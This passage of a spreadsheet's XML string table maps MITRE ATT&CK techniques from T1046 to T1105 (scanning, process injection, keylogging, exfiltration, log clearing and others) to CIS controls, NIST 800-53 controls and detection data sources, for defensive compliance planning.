  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>3.12,4.4,4.8,7.6,7.7,12.2,12.8,13.3,13.8,16.8,18.2,18.3,16.10</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-46,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>4.7,5.2,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,IA-2,RA-5,SC-3,SC-34,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>4.2,4.4,7.6,7.7,9.2,12.2,12.8,13.3,13.4,13.8</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,CM-2,CM-6,CM-7,SA-8,SA-9,SC-28,SC-31,SC-46,SC-7,SI-10,SI-15,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1048.001</t>
  </si>
  <si>
    <t>Exfiltration Over Symmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-46,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1048.002</t>
  </si>
  <si>
    <t>Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,CM-2,CM-6,CM-7,SA-8,SA-9,SC-13,SC-28,SC-31,SC-46,SC-7,SI-10,SI-15,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,10.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,CM-8,MP-7,RA-5,SA-8,SC-28,SC-41,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1052.001</t>
  </si>
  <si>
    <t>Exfiltration over USB</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-8,RA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-5,IA-2,RA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1053.002</t>
  </si>
  <si>
    <t>4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,8.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>4.7,5.3,5.4,6.1,6.2,6.8,8.1,8.11,8.2,8.5,8.9,18.3,18.5,8.10</t>
  </si>
  <si>
    <t>T1053.004</t>
  </si>
  <si>
    <t>Launchd</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation, Windows Registry: Windows Registry Key Creation</t>
  </si>
  <si>
    <t>T1053.006</t>
  </si>
  <si>
    <t>Systemd Timers</t>
  </si>
  <si>
    <t>3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-5,IA-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1053.007</t>
  </si>
  <si>
    <t>Container Orchestration Job</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,IA-2,IA-8</t>
  </si>
  <si>
    <t>Container: Container Creation, File: File Creation, Scheduled Job: Scheduled Job Creation</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,13.2,13.7</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2,SC-18,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification</t>
  </si>
  <si>
    <t>T1055.001</t>
  </si>
  <si>
    <t>Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>4.1,13.2,13.7</t>
  </si>
  <si>
    <t>AC-6,SC-18,SC-7,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification</t>
  </si>
  <si>
    <t>T1055.002</t>
  </si>
  <si>
    <t>Portable Executable Injection</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>T1055.004</t>
  </si>
  <si>
    <t>Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>T1055.009</t>
  </si>
  <si>
    <t>Proc Memory</t>
  </si>
  <si>
    <t>3.3,4.1,6.1,6.2,6.8,13.2,13.7</t>
  </si>
  <si>
    <t>AC-3,AC-6,CA-7,SC-18,SC-7,SI-16,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>File: File Modification</t>
  </si>
  <si>
    <t>T1055.011</t>
  </si>
  <si>
    <t>Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.012</t>
  </si>
  <si>
    <t>Process Hollowing</t>
  </si>
  <si>
    <t>T1055.013</t>
  </si>
  <si>
    <t>Process Doppelg'e4nging</t>
  </si>
  <si>
    <t>File: File Metadata, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.014</t>
  </si>
  <si>
    <t>VDSO Hijacking</t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1055.015</t>
  </si>
  <si>
    <t>ListPlanting</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Modification</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.001</t>
  </si>
  <si>
    <t>Keylogging</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1056.002</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>14.1,14.2,14.6</t>
  </si>
  <si>
    <t>CA-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1056.003</t>
  </si>
  <si>
    <t>Web Portal Capture</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,12.2</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2</t>
  </si>
  <si>
    <t>T1056.004</t>
  </si>
  <si>
    <t>Credential API Hooking</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command and Scripting Interpreter</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,9.3,9.6,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-11,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-8,IA-9,RA-5,SC-18,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,CM-8,IA-2,IA-8,IA-9,RA-5,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>2.5,2.7,4.1</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-2,CM-6,IA-9,SI-10,SI-16,SI-3,SI-4,SI-7,SR-11,SR-4,SR-5,SR-6</t>
  </si>
  <si>
    <t>T1059.003</t>
  </si>
  <si>
    <t>Windows Command Shell</t>
  </si>
  <si>
    <t>2.5,2.7</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-2,CM-6,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1059.004</t>
  </si>
  <si>
    <t>Unix Shell</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,9.3,9.6,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-18,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation, Script: Script Execution</t>
  </si>
  <si>
    <t>T1059.006</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>2.1,2.2,2.3,2.4,2.5,2.7,4.1,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CM-11,CM-2,CM-3,CM-5,CM-6,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1059.007</t>
  </si>
  <si>
    <t>JavaScript/JScript</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,9.3,9.6,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-18,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1059.008</t>
  </si>
  <si>
    <t>Network Device CLI</t>
  </si>
  <si>
    <t>2.7,4.1,4.7,5.3,5.4,6.1,6.2,6.8,12.2,12.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,IA-2,IA-8,SI-10,SI-16,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>Graphical User Interface</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>Hypervisor</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1064</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>7.1,7.2,7.3,7.4,7.5,10.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-4,AC-6,CA-7,CA-8,CM-2,CM-6,CM-7,CM-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069.001</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>Command: Command Execution, Group: Group Enumeration, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>Domain Groups</t>
  </si>
  <si>
    <t>T1069.003</t>
  </si>
  <si>
    <t>Cloud Groups</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.3,3.4,4.1,5.4,6.1,6.2,6.8,8.1,8.2,8.3,8.9,12.8,3.10,8.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-6,CP-6,CP-7,CP-9,SC-36,SC-4,SI-12,SI-23,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>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Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>3.1,3.11,3.12,3.3,3.4,4.1,5.4,6.1,6.2,6.8,8.1,8.2,8.3,12.8,3.10,8.10</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Clear Command History</t>
  </si>
  <si>
    <t>3.3,4.1,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-6,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>File Deletion</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion</t>
  </si>
  <si>
    <t>T1070.005</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Command: Command Execution, Network Traffic: Network Traffic Content, Process: Process Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>File: File Metadata, File: File Modification</t>
  </si>
  <si>
    <t>T1070.007</t>
  </si>
  <si>
    <t>Indicator Removal</t>
  </si>
  <si>
    <t>Clear Network Connection History and Configurations</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Firewall: Firewall Rule Modification, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1070.008</t>
  </si>
  <si>
    <t>Clear Mailbox Data</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1070.009</t>
  </si>
  <si>
    <t>Clear Persistence</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Modification, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-10,SC-20,SC-21,SC-22,SC-23,SC-31,SC-37,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1071.001</t>
  </si>
  <si>
    <t>Web Protocols</t>
  </si>
  <si>
    <t>T1071.002</t>
  </si>
  <si>
    <t>File Transfer Protocols</t>
  </si>
  <si>
    <t>T1071.003</t>
  </si>
  <si>
    <t>Mail Protocols</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>4.2,4.9,9.2,9.3,13.3,13.4,13.8,13.10</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-10,SC-20,SC-21,SC-22,SC-23,SC-31,SC-37,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>3.12,4.1,4.4,4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8,7.1,7.2,7.3,7.4,7.5,12.2,12.8,14.9,15.7,16.1,16.8,16.9,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-12,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-5,SC-12,SC-17,SC-46,SC-7,SI-2,SI-23,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Data Staged</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1074.001</t>
  </si>
  <si>
    <t>Local Data Staging</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>Remote Data Staging</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, File: File Creation</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.8,16.1,16.9</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-5,CM-6,IA-12,IA-2,IA-5,RA-5,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4,SR-6</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1078.001</t>
  </si>
  <si>
    <t>Default Accounts</t>
  </si>
  <si>
    <t>4.7,5.2</t>
  </si>
  <si>
    <t>AC-2,AC-5,AC-6,CA-7,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1078.002</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CM-5,CM-6,IA-12,IA-2,IA-5,SI-4</t>
  </si>
  <si>
    <t>T1078.003</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>4.1,4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-5,CM-6,IA-12,IA-2,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Cloud Accounts</t>
  </si>
  <si>
    <t>4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.3,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-5,CM-6,IA-12,IA-2,IA-5,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>2.5,3.3,4.1,6.1,6.2,6.8,10.5</t>
  </si>
  <si>
    <t>AC-3,CA-7,CM-2,CM-7,SC-4,SC-7,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>File and Directory Discovery</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>Account Discovery</t>
  </si>
  <si>
    <t>4.1,4.8,18.3,18.5</t>
  </si>
  <si>
    <t>CM-6,CM-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>Local Account</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Group: Group Enumeration, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>Command: Command Execution, Group: Group Enumeration, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1087.003</t>
  </si>
  <si>
    <t>Email Account</t>
  </si>
  <si>
    <t>T1087.004</t>
  </si>
  <si>
    <t>Cloud Account</t>
  </si>
  <si>
    <t>3.3,4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,IA-2,IA-8</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>4.2,4.4,9.3,13.3,13.4,13.8</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SC-8,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>T1090.002</t>
  </si>
  <si>
    <t>External Proxy</t>
  </si>
  <si>
    <t>T1090.003</t>
  </si>
  <si>
    <t>Multi-hop Proxy</t>
  </si>
  <si>
    <t>4.2,4.4,9.3,13.4</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-6,CM-7,SC-7,SI-10,SI-15</t>
  </si>
  <si>
    <t>T1090.004</t>
  </si>
  <si>
    <t>Domain Fronting</t>
  </si>
  <si>
    <t>SC-8</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,7.7,10.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-3,AC-6,CM-2,CM-6,CM-8,MP-7,RA-5,SC-41,SI-3,SI-4</t>
  </si>
  <si>
    <t>Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>Communication Through Removable Media</t>
  </si>
  <si>
    <t>2.3,2.5,4.1,4.8,10.3,18.3,18.5</t>
  </si>
  <si>
    <t>CM-2,CM-6,CM-7,CM-8,MP-7,RA-5,SI-3,SI-4</t>
  </si>
  <si>
    <t>Drive: Drive Access, Drive: Drive Creation</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>4.2,4.4,4.5,7.6,7.7,12.2,12.8,13.3,13.4,13.8,18.2,18.3,13.10</t>
  </si>
  <si>
    <t>AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-10,SI-15,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>3.12,3.3,4.1,4.2,4.4,4.7,4.8,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Modification, Group: Group Modification, Process: Process Creation, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1098.001</t>
  </si>
  <si>
    <t>Additional Cloud Credentials</t>
  </si>
  <si>
    <t>3.12,3.3,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,IA-5,SC-46,SC-7,SI-4,SI-7</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Exchange Email Delegate Permissions</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2,IA-5,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Group: Group Modification, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Add Office 365 Global Administrator Role</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,5.4,6.1,6.2,6.3,6.5</t>
  </si>
  <si>
    <t>User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1098.004</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>2.3,2.5,3.3,4.1,4.8,5.4,6.1,6.2,6.8,7.6,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-3,CM-2,CM-6,CM-7,CM-8,RA-5,SC-12,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1098.005</t>
  </si>
  <si>
    <t>Device Registration</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Creation, Application Log: Application Log Content, User Account: User Account Modification</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>2.3,2.5,9.3,13.3,13.8</t>
  </si>
  <si>
    <t>T1102.001</t>
  </si>
  <si>
    <t>Dead Drop Resolver</t>
  </si>
  <si>
    <t>T1102.002</t>
  </si>
  <si>
    <t>Bidirectional Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
